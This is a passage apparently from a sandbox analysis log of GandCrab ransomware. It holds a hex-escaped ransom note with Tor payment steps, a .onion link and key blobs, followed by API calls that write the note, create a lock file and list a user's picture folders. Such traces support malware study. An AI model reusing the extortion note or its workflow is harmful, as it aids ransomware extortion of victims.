\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.283] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0094.284] CloseHandle (hObject=0x2cc) returned 1 [0094.284] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.284] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.284] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x257)) [0094.284] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.285] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.285] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.285] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock") returned 102 [0094.285] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\9jlzubtiz6\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0094.286] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.286] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.286] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\") returned 78 [0094.286] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\*" [0094.286] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5037b8 [0094.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.286] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.287] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.287] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.287] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.287] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.288] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\9JLzUbTiz6\\d2ca4a09d2ca4deb61a.lock" [0094.288] lstrlenW (lpString=".titwmvjl") returned 9 